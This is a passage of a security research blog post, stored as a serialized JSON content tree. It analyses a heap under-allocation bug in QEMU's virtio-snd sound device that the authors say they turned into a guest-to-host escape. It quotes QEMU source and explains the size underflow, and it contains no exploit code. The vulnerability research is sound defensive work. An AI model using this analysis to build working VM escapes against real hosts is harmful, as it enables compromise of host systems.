0356,"children":130357},{},[130358],{"type":30,"value":130359},"Heap overflows are often exploitable, but far less so when the corrupted bytes are not under your control. In many cases, that kind of bug is written off as a crash and nothing more. However, in this post we show how we turned such an overflow into a reliable QEMU guest-to-host escape by abusing new glibc allocator behavior and QEMU-specific heap spray techniques.",{"type":24,"tag":43,"props":130361,"children":130362},{"id":130351},[130363],{"type":30,"value":130364},"QEMU",{"type":24,"tag":32,"props":130366,"children":130367},{},[130368],{"type":30,"value":130369},"QEMU is a machine emulator and virtualizer that lets a host system run guest operating systems. It presents the guest with virtual hardware, while the logic backing that hardware runs inside the host-side QEMU process.",{"type":24,"tag":80,"props":130371,"children":130373},{"id":130372},"virtio-devices",[130374],{"type":30,"value":130375},"Virtio Devices",{"type":24,"tag":32,"props":130377,"children":130378},{},[130379],{"type":30,"value":130380},"For guest-to-host escape research, the interesting part of QEMU is the interface between the guest and those host-side device implementations. Every request sent by the guest is eventually parsed and handled by code running in the QEMU process. This is interesting because any unhandled edge case in the device could lead to some kind of host state corruption.",{"type":24,"tag":32,"props":130382,"children":130383},{},[130384],{"type":30,"value":130385},"At a high level, the communication between the driver running in the guest and the device running on the host is simple - the guest-side virtio driver shares requests over virtqueues, while the host-side virtio device consumes those requests, processes and returns responses.",{"type":24,"tag":32,"props":130387,"children":130388},{},[130389],{"type":24,"tag":177,"props":130390,"children":130393},{"alt":130391,"src":130392},"flowchart1","/posts/virtio-snd-qemu-0day/flowchart1.png",[],{"type":24,"tag":43,"props":130395,"children":130397},{"id":130396},"finding-a-bug",[130398],{"type":30,"value":130399},"Finding a Bug",{"type":24,"tag":32,"props":130401,"children":130402},{},[130403,130405,130411],{"type":30,"value":130404},"While looking for devices to research, we focused on ones that seemed to have received less scrutiny in the past. With that in mind, we started with the sound device ",{"type":24,"tag":145,"props":130406,"children":130408},{"className":130407},[],[130409],{"type":30,"value":130410},"virtio-snd",{"type":30,"value":206},{"type":24,"tag":80,"props":130413,"children":130414},{"id":130410},[130415],{"type":30,"value":130410},{"type":24,"tag":32,"props":130417,"children":130418},{},[130419],{"type":30,"value":130420},"From the official documentation:",{"type":24,"tag":9770,"props":130422,"children":130423},{},[130424],{"type":24,"tag":32,"props":130425,"children":130426},{},[130427],{"type":30,"value":130428},"Virtio sound implements capture and playback from inside a guest using the configured audio backend of the host machine.",{"type":24,"tag":32,"props":130430,"children":130431},{},[130432],{"type":30,"value":130433},"Essentially, it allows software running inside the guest to interact with the host's audio stack through a paravirtualized sound device. Playback streams send guest-provided audio data to the host backend, while capture streams let the guest receive audio input from the host.",{"type":24,"tag":270,"props":130435,"children":130437},{"id":130436},"audio-data-buffers",[130438],{"type":30,"value":130439},"Audio Data Buffers",{"type":24,"tag":32,"props":130441,"children":130442},{},[130443],{"type":30,"value":130444},"This audio data flows through buffers allocated by the host-side virtio-snd device and stored in a FIFO linked list for the corresponding stream.",{"type":24,"tag":32,"props":130446,"children":130447},{},[130448,130450,130456],{"type":30,"value":130449},"For example, the following is ",{"type":24,"tag":145,"props":130451,"children":130453},{"className":130452},[],[130454],{"type":30,"value":130455},"virtio_snd_handle_rx_xfer",{"type":30,"value":130457},", which is responsible for allocating buffers for an input audio stream:",{"type":24,"tag":291,"props":130459,"children":130461},{"code":130460,"language":294,"meta":7,"className":295,"style":7},"/*\n * The rx virtqueue handler. Makes the buffers available to their\n * respective streams for consumption.\n *\n * @vdev: VirtIOSound device\n * @vq: rx virtqueue\n */\nstatic void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)\n{\n VirtQueueElement *elem;\n [...]\n\n for (;;) {\n VirtIOSoundPCMStream *stream;\n\n elem = virtqueue_pop(vq, sizeof(VirtQueueElement)); // [1]\n if (!elem) {\n break;\n }\n\n [...]\n\n WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n size = iov_size(elem->in_sg, elem->in_num) -\n sizeof(virtio_snd_pcm_status); // [2]\n buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);\n buffer->elem = elem;\n buffer->vq = vq;\n buffer->size = 0;\n buffer->offset = 0;\n QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry); // [3]\n }\n continue;\n\n [...]\n}\n\n",[130462],{"type":24,"tag":145,"props":130463,"children":130464},{"__ignoreMap":7},[130465,130472,130480,130488,130495,130503,130511,130519,130567,130574,130591,130598,130605,130617,130634,130641,130677,130697,130708,130715,130722,130729,130736,130769,130828,130846,130885,130910,130934,130961,130988,131026,131033,131045,131052,131059],{"type":24,"tag":301,"props":130466,"children":130467},{"class":303,"line":304},[130468],{"type":24,"tag":301,"props":130469,"children":130470},{"style":1062},[130471],{"type":30,"value":56097},{"type":24,"tag":301,"props":130473,"children":130474},{"class":303,"line":320},[130475],{"type":24,"tag":301,"props":130476,"children":130477},{"style":1062},[130478],{"type":30,"value":130479}," * The rx virtqueue handler. Makes the buffers available to their\n",{"type":24,"tag":301,"props":130481,"children":130482},{"class":303,"line":335},[130483],{"type":24,"tag":301,"props":130484,"children":130485},{"style":1062},[130486],{"type":30,"value":130487}," * respective streams for consumption.\n",{"type":24,"tag":301,"props":130489,"children":130490},{"class":303,"line":344},[130491],{"type":24,"tag":301,"props":130492,"children":130493},{"style":1062},[130494],{"type":30,"value":26260},{"type":24,"tag":301,"props":130496,"children":130497},{"class":303,"line":401},[130498],{"type":24,"tag":301,"props":130499,"children":130500},{"style":1062},[130501],{"type":30,"value":130502}," * @vdev: VirtIOSound device\n",{"type":24,"tag":301,"props":130504,"children":130505},{"class":303,"line":415},[130506],{"type":24,"tag":301,"props":130507,"children":130508},{"style":1062},[130509],{"type":30,"value":130510}," * @vq: rx virtqueue\n",{"type":24,"tag":301,"props":130512,"children":130513},{"class":303,"line":439},[130514],{"type":24,"tag":301,"props":130515,"children":130516},{"style":1062},[130517],{"type":30,"value":130518}," */\n",{"type":24,"tag":301,"props":130520,"children":130521},{"class":303,"line":447},[130522,130526,130530,130535,130540,130544,130549,130554,130558,130563],{"type":24,"tag":301,"props":130523,"children":130524},{"style":348},[130525],{"type":30,"value":752},{"type":24,"tag":301,"props":130527,"children":130528},{"style":348},[130529],{"type":30,"value":757},{"type":24,"tag":301,"props":130531,"children":130532},{"style":314},[130533],{"type":30,"value":130534}," virtio_snd_handle_rx_xfer",{"type":24,"tag":301,"props":130536,"children":130537},{"style":359},[130538],{"type":30,"value":130539},"(VirtIODevice ",{"type":24,"tag":301,"props":130541,"children":130542},{"style":385},[130543],{"type":30,"value":772},{"type":24,"tag":301,"props":130545,"children":130546},{"style":369},[130547],{"type":30,"value":130548},"vdev",{"type":24,"tag":301,"props":130550,"children":130551},{"style":359},[130552],{"type":30,"value":130553},", VirtQueue ",{"type":24,"tag":301,"props":130555,"children":130556},{"style":385},[130557],{"type":30,"value":772},{"type":24,"tag":301,"props":130559,"children":130560},{"style":369},[130561],{"type":30,"value":130562},"vq",{"type":24,"tag":301,"props":130564,"children":130565},{"style":359},[130566],{"type":30,"value":791},{"type":24,"tag":301,"props":130568,"children":130569},{"class":303,"line":476},[130570],{"type":24,"tag":301,"props":130571,"children":130572},{"style":359},[130573],{"type":30,"value":799},{"type":24,"tag":301,"props":130575,"children":130576},{"class":303,"line":495},[130577,130582,130586],{"type":24,"tag":301,"props":130578,"children":130579},{"style":359},[130580],{"type":30,"value":130581}," VirtQueueElement ",{"type":24,"tag":301,"props":130583,"children":130584},{"style":385},[130585],{"type":30,"value":772},{"type":24,"tag":301,"props":130587,"children":130588},{"style":359},[130589],{"type":30,"value":130590},"elem;\n",{"type":24,"tag":301,"props":130592,"children":130593},{"class":303,"line":504},[130594],{"type":24,"tag":301,"props":130595,"children":130596},{"style":359},[130597],{"type":30,"value":111495},{"type":24,"tag":301,"props":130599,"children":130600},{"class":303,"line":512},[130601],{"type":24,"tag":301,"props":130602,"children":130603},{"emptyLinePlaceholder":16},[130604],{"type":30,"value":341},{"type":24,"tag":301,"props":130606,"children":130607},{"class":303,"line":592},[130608,130612],{"type":24,"tag":301,"props":130609,"children":130610},{"style":308},[130611],{"type":30,"value":3249},{"type":24,"tag":301,"props":130613,"children":130614},{"style":359},[130615],{"type":30,"value":130616}," (;;) {\n",{"type":24,"tag":301,"props":130618,"children":130619},{"class":303,"line":619},[130620,130625,130629],{"type":24,"tag":301,"props":130621,"children":130622},{"style":359},[130623],{"type":30,"value":130624}," VirtIOSoundPCMStream ",{"type":24,"tag":301,"props":130626,"children":130627},{"style":385},[130628],{"type":30,"value":772},{"type":24,"tag":301,"props":130630,"children":130631},{"style":359},[130632],{"type":30,"value":130633},"stream;\n",{"type":24,"tag":301,"props":130635,"children":130636},{"class":303,"line":635},[130637],{"type":24,"tag":301,"props":130638,"children":130639},{"emptyLinePlaceholder":16},[130640],{"type":30,"value":341},{"type":24,"tag":301,"props":130642,"children":130643},{"class":303,"line":643},[130644,130649,130653,130658,130663,130667,130672],{"type":24,"tag":301,"props":130645,"children":130646},{"style":359},[130647],{"type":30,"value":130648}," elem ",{"type":24,"tag":301,"props":130650,"children":130651},{"style":385},[130652],{"type":30,"value":523},{"type":24,"tag":301,"props":130654,"children":130655},{"style":314},[130656],{"type":30,"value":130657}," virtqueue_pop",{"type":24,"tag":301,"props":130659,"children":130660},{"style":359},[130661],{"type":30,"value":130662},"(vq, ",{"type":24,"tag":301,"props":130664,"children":130665},{"style":348},[130666],{"type":30,"value":62050},{"type":24,"tag":301,"props":130668,"children":130669},{"style":359},[130670],{"type":30,"value":130671},"(VirtQueueElement));",{"type":24,"tag":301,"props":130673,"children":130674},{"style":1062},[130675],{"type":30,"value":130676}," // [1]\n",{"type":24,"tag":301,"props":130678,"children":130679},{"class":303,"line":652},[130680,130684,130688,130692],{"type":24,"tag":301,"props":130681,"children":130682},{"style":308},[130683],{"type":30,"value":3285},{"type":24,"tag":301,"props":130685,"children":130686},{"style":359},[130687],{"type":30,"value":873},{"type":24,"tag":301,"props":130689,"children":130690},{"style":385},[130691],{"type":30,"value":2485},{"type":24,"tag":301,"props":130693,"children":130694},{"style":359},[130695],{"type":30,"value":130696},"elem) {\n",{"type":24,"tag":301,"props":130698,"children":130699},{"class":303,"line":666},[130700,130704],{"type":24,"tag":301,"props":130701,"children":130702},{"style":308},[130703],{"type":30,"value":10127},{"type":24,"tag":301,"props":130705,"children":130706},{"style":359},[130707],{"type":30,"value":492},{"type":24,"tag":301,"props":130709,"children":130710},{"class":303,"line":674},[130711],{"type":24,"tag":301,"props":130712,"children":130713},{"style":359},[130714],{"type":30,"value":3345},{"type":24,"tag":301,"props":130716,"children":130717},{"class":303,"line":692},[130718],{"type":24,"tag":301,"props":130719,"children":130720},{"emptyLinePlaceholder":16},[130721],{"type":30,"value":341},{"type":24,"tag":301,"props":130723,"children":130724},{"class":303,"line":3631},[130725],{"type":24,"tag":301,"props":130726,"children":130727},{"style":359},[130728],{"type":30,"value":5858},{"type":24,"tag":301,"props":130730,"children":130731},{"class":303,"line":3639},[130732],{"type":24,"tag":301,"props":130733,"children":130734},{"emptyLinePlaceholder":16},[130735],{"type":30,"value":341},{"type":24,"tag":301,"props":130737,"children":130738},{"class":303,"line":3647},[130739,130744,130748,130752,130756,130760,130765],{"type":24,"tag":301,"props":130740,"children":130741},{"style":314},[130742],{"type":30,"value":130743}," WITH_QEMU_LOCK_GUARD",{"type":24,"tag":301,"props":130745,"children":130746},{"style":359},[130747],{"type":30,"value":362},{"type":24,"tag":301,"props":130749,"children":130750},{"style":385},[130751],{"type":30,"value":556},{"type":24,"tag":301,"props":130753,"children":130754},{"style":369},[130755],{"type":30,"value":43003},{"type":24,"tag":301,"props":130757,"children":130758},{"style":359},[130759],{"type":30,"value":882},{"type":24,"tag":301,"props":130761,"children":130762},{"style":369},[130763],{"type":30,"value":130764},"queue_mutex",{"type":24,"tag":301,"props":130766,"children":130767},{"style":359},[130768],{"type":30,"value":398},{"type":24,"tag":301,"props":130770,"children":130771},{"class":303,"line":3685},[130772,130777,130781,130786,130790,130794,130798,130803,130807,130811,130815,130820,130824],{"type":24,"tag":301,"props":130773,"children":130774},{"style":359},[130775],{"type":30,"value":130776}," size ",{"type":24,"tag":301,"props":130778,"children":130779},{"style":385},[130780],{"type":30,"value":523},{"type":24,"tag":301,"props":130782,"children":130783},{"style":314},[130784],{"type":30,"value":130785}," iov_size",{"type":24,"tag":301,"props":130787,"children":130788},{"style":359},[130789],{"type":30,"value":362},{"type":24,"tag":301,"props":130791,"children":130792},{"style":369},[130793],{"type":30,"value":58789},{"type":24,"tag":301,"props":130795,"children":130796},{"style":359},[130797],{"type":30,"value":882},{"type":24,"tag":301,"props":130799,"children":130800},{"style":369},[130801],{"type":30,"value":130802},"in_sg",{"type":24,"tag":301,"props":130804,"children":130805},{"style":359},[130806],{"type":30,"value":377},{"type":24,"tag":301,"props":130808,"children":130809},{"style":369},[130810],{"type":30,"value":58789},{"type":24,"tag":301,"props":130812,"children":130813},{"style":359},[130814],{"type":30,"value":882},{"type":24,"tag":301,"props":130816,"children":130817},{"style":369},[130818],{"type":30,"value":130819},"in_num",{"type":24,"tag":301,"props":130821,"children":130822},{"style":359},[130823],{"type":30,"value":911},{"type":24,"tag":301,"props":130825,"children":130826},{"style":385},[130827],{"type":30,"value":57591},{"type":24,"tag":301,"props":130829,"children":130830},{"class":303,"line":3713},[130831,130836,130841],{"type":24,"tag":301,"props":130832,"children":130833},{"style":348},[130834],{"type":30,"value":130835}," sizeof",{"type":24,"tag":301,"props":130837,"children":130838},{"style":359},[130839],{"type":30,"value":130840},"(virtio_snd_pcm_status);",{"type":24,"tag":301,"props":130842,"children":130843},{"style":1062},[130844],{"type":30,"value":130845}," // [2]\n",{"type":24,"tag":301,"props":130847,"children":130848},{"class":303,"line":3721},[130849,130854,130858,130863,130867,130871,130876,130880],{"type":24,"tag":301,"props":130850,"children":130851},{"style":359},[130852],{"type":30,"value":130853}," buffer ",{"type":24,"tag":301,"props":130855,"children":130856},{"style":385},[130857],{"type":30,"value":523},{"type":24,"tag":301,"props":130859,"children":130860},{"style":314},[130861],{"type":30,"value":130862}," g_malloc0",{"type":24,"tag":301,"props":130864,"children":130865},{"style":359},[130866],{"type":30,"value":362},{"type":24,"tag":301,"props":130868,"children":130869},{"style":348},[130870],{"type":30,"value":62050},{"type":24,"tag":301,"props":130872,"children":130873},{"style":359},[130874],{"type":30,"value":130875},"(VirtIOSoundPCMBuffer) ",{"type":24,"tag":301,"props":130877,"children":130878},{"style":385},[130879],{"type":30,"value":11206},{"type":24,"tag":301,"props":130881,"children":130882},{"style":359},[130883],{"type":30,"value":130884}," size);\n",{"type":24,"tag":301,"props":130886,"children":130887},{"class":303,"line":3751},[130888,130893,130897,130901,130905],{"type":24,"tag":301,"props":130889,"children":130890},{"style":369},[130891],{"type":30,"value":130892}," buffer",{"type":24,"tag":301,"props":130894,"children":130895},{"style":359},[130896],{"type":30,"value":882},{"type":24,"tag":301,"props":130898,"children":130899},{"style":369},[130900],{"type":30,"value":58789},{"type":24,"tag":301,"props":130902,"children":130903},{"style":385},[130904],{"type":30,"value":2537},{"type":24,"tag":301,"props":130906,"children":130907},{"style":359},[130908],{"type":30,"value":130909}," elem;\n",{"type":24,"tag":301,"props":130911,"children":130912},{"class":303,"line":3782},[130913,130917,130921,130925,130929],{"type":24,"tag":301,"props":130914,"children":130915},{"style":369},[130916],{"type":30,"value":130892},{"type":24,"tag":301,"props":130918,"children":130919},{"style":359},[130920],{"type":30,"value":882},{"type":24,"tag":301,"props":130922,"children":130923},{"style":369},[130924],{"type":30,"value":130562},{"type":24,"tag":301,"props":130926,"children":130927},{"style":385},[130928],{"type":30,"value":2537},{"type":24,"tag":301,"props":130930,"children":130931},{"style":359},[130932],{"type":30,"value":130933}," vq;\n",{"type":24,"tag":301,"props":130935,"children":130936},{"class":303,"line":3791},[130937,130941,130945,130949,130953,130957],{"type":24,"tag":301,"props":130938,"children":130939},{"style":369},[130940],{"type":30,"value":130892},{"type":24,"tag":301,"props":130942,"children":130943},{"style":359},[130944],{"type":30,"value":882},{"type":24,"tag":301,"props":130946,"children":130947},{"style":369},[130948],{"type":30,"value":3219},{"type":24,"tag":301,"props":130950,"children":130951},{"style":385},[130952],{"type":30,"value":2537},{"type":24,"tag":301,"props":130954,"children":130955},{"style":466},[130956],{"type":30,"value":685},{"type":24,"tag":301,"props":130958,"children":130959},{"style":359},[130960],{"type":30,"value":492},{"type":24,"tag":301,"props":130962,"children":130963},{"class":303,"line":3819},[130964,130968,130972,130976,130980,130984],{"type":24,"tag":301,"props":130965,"children":130966},{"style":369},[130967],{"type":30,"value":130892},{"type":24,"tag":301,"props":130969,"children":130970},{"style":359},[130971],{"type":30,"value":882},{"type":24,"tag":301,"props":130973,"children":130974},{"style":369},[130975],{"type":30,"value":20694},{"type":24,"tag":301,"props":130977,"children":130978},{"style":385},[130979],{"type":30,"value":2537},{"type":24,"tag":301,"props":130981,"children":130982},{"style":466},[130983],{"type":30,"value":685},{"type":24,"tag":301,"props":130985,"children":130986},{"style":359},[130987],{"type":30,"value":492},{"type":24,"tag":301,"props":130989,"children":130990},{"class":303,"line":4397},[130991,130996,131000,131004,131008,131012,131017,131022],{"type":24,"tag":301,"props":130992,"children":130993},{"style":314},[130994],{"type":30,"value":130995}," QSIMPLEQ_INSERT_TAIL",{"type":24,"tag":301,"props":130997,"children":130998},{"style":359},[130999],{"type":30,"value":362},{"type":24,"tag":301,"props":131001,"children":131002},{"style":385},[131003],{"type":30,"value":556},{"type":24,"tag":301,"props":131005,"children":131006},{"style":369},[131007],{"type":30,"value":43003},{"type":24,"tag":301,"props":131009,"children":131010},{"style":359},[131011],{"type":30,"value":882},{"type":24,"tag":301,"props":131013,"children":131014},{"style":369},[131015],{"type":30,"value":131016},"queue",{"type":24,"tag":301,"props":131018,"children":131019},{"style":359},[131020],{"type":30,"value":131021},", buffer, entry);",{"type":24,"tag":301,"props":131023,"children":131024},{"style":1062},[131025],{"type":30,"value":59354},{"type":24,"tag":301,"props":131027,"children":131028},{"class":303,"line":4405},[131029],{"type":24,"tag":301,"props":131030,"children":131031},{"style":359},[131032],{"type":30,"value":3345},{"type":24,"tag":301,"props":131034,"children":131035},{"class":303,"line":4422},[131036,131041],{"type":24,"tag":301,"props":131037,"children":131038},{"style":308},[131039],{"type":30,"value":131040}," continue",{"type":24,"tag":301,"props":131042,"children":131043},{"style":359},[131044],{"type":30,"value":492},{"type":24,"tag":301,"props":131046,"children":131047},{"class":303,"line":4438},[131048],{"type":24,"tag":301,"props":131049,"children":131050},{"emptyLinePlaceholder":16},[131051],{"type":30,"value":341},{"type":24,"tag":301,"props":131053,"children":131054},{"class":303,"line":4446},[131055],{"type":24,"tag":301,"props":131056,"children":131057},{"style":359},[131058],{"type":30,"value":5858},{"type":24,"tag":301,"props":131060,"children":131061},{"class":303,"line":4506},[131062],{"type":24,"tag":301,"props":131063,"children":131064},{"style":359},[131065],{"type":30,"value":698},{"type":24,"tag":32,"props":131067,"children":131068},{},[131069,131071,131077,131079,131085,131087,131092,131093,131099],{"type":30,"value":131070},"At ",{"type":24,"tag":145,"props":131072,"children":131074},{"className":131073},[],[131075],{"type":30,"value":131076},"[1]",{"type":30,"value":131078},", a ",{"type":24,"tag":145,"props":131080,"children":131082},{"className":131081},[],[131083],{"type":30,"value":131084},"VirtQueueElement *elem",{"type":30,"value":131086}," is popped from the virtqueue. It contains the ",{"type":24,"tag":145,"props":131088,"children":131090},{"className":131089},[],[131091],{"type":30,"value":130802},{"type":30,"value":2378},{"type":24,"tag":145,"props":131094,"children":131096},{"className":131095},[],[131097],{"type":30,"value":131098},"out_sg",{"type":30,"value":131100}," iovecs that describe the guest request, and is therefore fully guest-controlled.",{"type":24,"tag":32,"props":131102,"children":131103},{},[131104,131106,131112,131114,131120,131122,131128,131130,131136,131138,131144],{"type":30,"value":131105},"Further at ",{"type":24,"tag":145,"props":131107,"children":131109},{"className":131108},[],[131110],{"type":30,"value":131111},"[2]",{"type":30,"value":131113},", the device computes the size of the data buffer as ",{"type":24,"tag":145,"props":131115,"children":131117},{"className":131116},[],[131118],{"type":30,"value":131119},"iov_size(elem->in_sg, elem->in_num) - sizeof(virtio_snd_pcm_status)",{"type":30,"value":131121},". That value is then used in the allocation: ",{"type":24,"tag":145,"props":131123,"children":131125},{"className":131124},[],[131126],{"type":30,"value":131127},"g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size)",{"type":30,"value":131129},". Finally, at ",{"type":24,"tag":145,"props":131131,"children":131133},{"className":131132},[],[131134],{"type":30,"value":131135},"[3]",{"type":30,"value":131137},", the newly allocated buffer is appended to the ",{"type":24,"tag":145,"props":131139,"children":131141},{"className":131140},[],[131142],{"type":30,"value":131143},"stream->queue",{"type":30,"value":131145}," linked list.",{"type":24,"tag":32,"props":131147,"children":131148},{},[131149,131151,131156,131158,131163,131165,131170,131172,131178],{"type":30,"value":131150},"Because both the ",{"type":24,"tag":145,"props":131152,"children":131154},{"className":131153},[],[131155],{"type":30,"value":130802},{"type":30,"value":131157}," iovec and the ",{"type":24,"tag":145,"props":131159,"children":131161},{"className":131160},[],[131162],{"type":30,"value":130819},{"type":30,"value":131164}," field are guest-controlled, and there is no check that the total ",{"type":24,"tag":145,"props":131166,"children":131168},{"className":131167},[],[131169],{"type":30,"value":130802},{"type":30,"value":131171}," size is at least ",{"type":24,"tag":145,"props":131173,"children":131175},{"className":131174},[],[131176],{"type":30,"value":131177},"sizeof(virtio_snd_pcm_status)",{"type":30,"value":131179},", this calculation can underflow if the guest provides a smaller input buffer - that gives us our first bug.",{"type":24,"tag":32,"props":131181,"children":131182},{},[131183,131185,131190,131192,131198,131200,131206,131208,131214],{"type":30,"value":131184},"From the guest driver, we can provide an empty ",{"type":24,"tag":145,"props":131186,"children":131188},{"className":131187},[],[131189],{"type":30,"value":130802},{"type":30,"value":131191}," iovec. In that case, the calculation becomes ",{"type":24,"tag":145,"props":131193,"children":131195},{"className":131194},[],[131196],{"type":30,"value":131197},"0 - sizeof(virtio_snd_pcm_status)",{"type":30,"value":131199},", so the allocation size effectively becomes ",{"type":24,"tag":145,"props":131201,"children":131203},{"className":131202},[],[131204],{"type":30,"value":131205},"sizeof(VirtIOSoundPCMBuffer) - 8",{"type":30,"value":131207},". Given the definition of ",{"type":24,"tag":145,"props":131209,"children":131211},{"className":131210},[],[131212],{"type":30,"value":131213},"VirtIOSoundPCMBuffer",{"type":30,"value":1679},{"type":24,"tag":291,"props":131216,"children":131218},{"code":131217,"language":294,"meta":7,"className":295,"style":7},"struct VirtIOSoundPCMBuffer {\n QSIMPLEQ_ENTRY(VirtIOSoundPCMBuffer) entry;\n VirtQueueElement *elem;\n VirtQueue *vq;\n size_t size;\n uint64_t offset;\n /* Used for the TX queue for lazy I/O copy from `elem` */\n bool populated;\n uint8_t data[];\n};\n",[131219],{"type":24,"tag":145,"props":131220,"children":131221},{"__ignoreMap":7},[131222,131234,131247,131262,131279,131290,131302,131310,131322,131342],{"type":24,"tag":301,"props":131223,"children":131224},{"class":303,"line":304},[131225,131229],{"type":24,"tag":301,"props":131226,"children":131227},{"style":348},[131228],{"type":30,"value":3010},{"type":24,"tag":301,"props":131230,"children":131231},{"style":359},[131232],{"type":30,"value":131233}," VirtIOSoundPCMBuffer {\n",{"type":24,"tag":301,"props":131235,"children":131236},{"class":303,"line":320},[131237,131242],{"type":24,"tag":301,"props":131238,"children":131239},{"style":314},[131240],{"type":30,"value":131241}," QSIMPLEQ_ENTRY",{"type":24,"tag":301,"props":131243,"children":131244},{"style":359},[131245],{"type":30,"value":131246},"(VirtIOSoundPCMBuffer) entry;\n",{"type":24,"tag":301,"props":131248,"children":131249},{"class":303,"line":335},[131250,131254,131258],{"type":24,"tag":301,"props":131251,"children":131252},{"style":359},[131253],{"type":30,"value":130581},{"type":24,"tag":301,"props":131255,"children":131256},{"style":385},[131257],{"type":30,"value":772},{"type":24,"tag":301,"props":131259,"children":131260},{"style":359},[131261],{"type":30,"value":130590},{"type":24,"tag":301,"props":131263,"children":131264},{"class":303,"line":344},[131265,131270,131274],{"type":24,"tag":301,"props":131266,"children":131267},{"style":359},[131268],{"type":30,"value":131269}," VirtQueue ",{"type":24,"tag":301,"props":131271,"children":131272},{"style":385},[131273],{"type":30,"value":772},{"type":24,"tag":301,"props":131275,"children":131276},{"style":359},[131277],{"type":30,"value":131278},"vq;\n",{"type":24,"tag":301,"props":131280,"children":131281},{"class":303,"line":401},[131282,131286],{"type":24,"tag":301,"props":131283,"children":131284},{"style":348},[131285],{"type":30,"value":3093},{"type":24,"tag":301,"props":131287,"children":131288},{"style":359},[131289],{"type":30,"value":3098},{"type":24,"tag":301,"props":131291,"children":131292},{"class":303,"line":415},[131293,131297],{"type":24,"tag":301,"props":131294,"children":131295},{"style":348},[131296],{"type":30,"value":62335},{"type":24,"tag":301,"props":131298,"children":131299},{"style":359},[131300],{"type":30,"value":131301}," offset;\n",{"type":24,"tag":301,"props":131303,"children":131304},{"class":303,"line":439},[131305],{"type":24,"tag":301,"props":131306,"children":131307},{"style":1062},[131308],{"type":30,"value":131309}," /* Used for the TX queue for lazy I/O copy from `elem` */\n",{"type":24,"tag":301,"props":131311,"children":131312},{"class":303,"line":447},[131313,131317],{"type":24,"tag":301,"props":131314,"children":131315},{"style":348},[131316],{"type":30,"value":53209},{"type":24,"tag":301,"props":131318,"children":131319},{"style":359},[131320],{"type":30,"value":131321}," populated;\n",{"type":24,"tag":301,"props":131323,"children":131324},{"class":303,"line":476},[131325,131329,131333,131338],{"type":24,"tag":301,"props":131326,"children":131327},{"style":348},[131328],{"type":30,"value":65172},{"type":24,"tag":301,"props":131330,"children":131331},{"style":359},[131332],{"type":30,"value":21895},{"type":24,"tag":301,"props":131334,"children":131335},{"style":348},[131336],{"type":30,"value":131337},"[]",{"type":24,"tag":301,"props":131339,"children":131340},{"style":359},[131341],{"type":30,"value":492},{"type":24,"tag":301,"props":131343,"children":131344},{"class":303,"line":495},[131345],{"type":24,"tag":301,"props":131346,"children":131347},{"style":359},[131348],{"type":30,"value":3118},{"type":24,"tag":32,"props":131350,"children":131351},{},[131352,131354,131360,131362,131367,131369,131374,131376,131381,131383,131388,131390,131396],{"type":30,"value":131353},"That under-allocation removes the ",{"type":24,"tag":145,"props":131355,"children":131357},{"className":131356},[],[131358],{"type":30,"value":131359},"populated",{"type":30,"value":131361}," field along with the variable-sized ",{"type":24,"tag":145,"props":131363,"children":131365},{"className":131364},[],[131366],{"type":30,"value":10528},{"type":30,"value":131368}," array. As the comment says, ",{"type":24,"tag":145,"props":131370,"children":131372},{"className":131371},[],[131373],{"type":30,"value":131359},{"type":30,"value":131375}," is only relevant to the TX path and is not used for audio input. However, by making the iovec size ",{"type":24,"tag":145,"props":131377,"children":131379},{"className":131378},[],[131380],{"type":30,"value":546},{"type":30,"value":131382},", the device believes data should be ",{"type":24,"tag":145,"props":131384,"children":131386},{"className":131385},[],[131387],{"type":30,"value":546},{"type":30,"value":131389}," byte, while the actual allocation is ",{"type":24,"tag":145,"props":131391,"children":131393},{"className":131392},[],[131394],{"type":30,"value":131395},"sizeof(VirtIOSoundPCMBuffer) - 7",{"type":30,"value":206},{"type":24,"tag":270,"props":131398,"children":131400},{"id":131399},"populating-data-buffers",[131401],{"type":30,"value":131402},"Populating Data Buffers",{"type":24,"tag":32,"props":131404,"children":131405},{},[131406],{"type":30,"value":131407},"Let's take a look at how the allocated data buffer for the input stream is filled:",{"type":24,"tag":291,"props":131409,"children":131411},{"code":131410,"language":294,"meta":7,"className":295,"style":7},"/*\n * AUD_* input callback.\n *\n * @data: VirtIOSoundPCMStream stream\n * @available: number of bytes that can be read with AUD_read()\n */\nstatic void virtio_snd_pcm_in_cb(void *data, int available)\n{\n VirtIOSoundPCMStream *stream = data;\n VirtIOSoundPCMBuffer *buffer;\n size_t size, max_size;\n\n WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n while (!QSIMPLEQ_EMPTY(&stream->queue)) {\n buffer = QSIMPLEQ_FIRST(&stream->queue);\n\n [...]\n\n max_size = iov_size( // [1]\n buffer->elem->in_sg,\n buffer->elem->in_num\n );\n for (;;) {\n if (buffer->size >= max_size) { // [2]\n return_rx_buffer(stream, buffer);\n break;\n }\n size = AUD_read(stream->voice.in,\n buffer->data + buffer->size,\n MIN(available, (stream->params.period_bytes - // [3]\n buffer->size)));\n if (!size) {\n available = 0;\n break;\n }\n buffer->size += size;\n available -= size;\n [...]\n }\n }\n }\n}\n",[131412],{"type":24,"tag":145,"props":131413,"children":131414},{"__ignoreMap":7},[131415,131422,131430,131437,131445,131453,131460,131509,131516,131542,131559,131571,131578,131610,131655,131695,131702,131710,131717,131742,131770,131794,131801,131813,131851,131864,131876,131883,131929,131966,132009,132030,132050,132070,132081,132088,132111,132127,132135,132142,132149,132156],{"type":24,"tag":301,"props":131416,"children":131417},{"class":303,"line":304},[131418],{"type":24,"tag":301,"props":131419,"children":131420},{"style":1062},[131421],{"type":30,"value":56097},{"type":24,"tag":301,"props":131423,"children":131424},{"class":303,"line":320},[131425],{"type":24,"tag":301,"props":131426,"children":131427},{"style":1062},[131428],{"type":30,"value":131429}," * AUD_* input callback.\n",{"type":24,"tag":301,"props":131431,"children":131432},{"class":303,"line":335},[131433],{"type":24,"tag":301,"props":131434,"children":131435},{"style":1062},[131436],{"type":30,"value":26260},{"type":24,"tag":301,"props":131438,"children":131439},{"class":303,"line":344},[131440],{"type":24,"tag":301,"props":131441,"children":131442},{"style":1062},[131443],{"type":30,"value":131444}," * @data: VirtIOSoundPCMStream 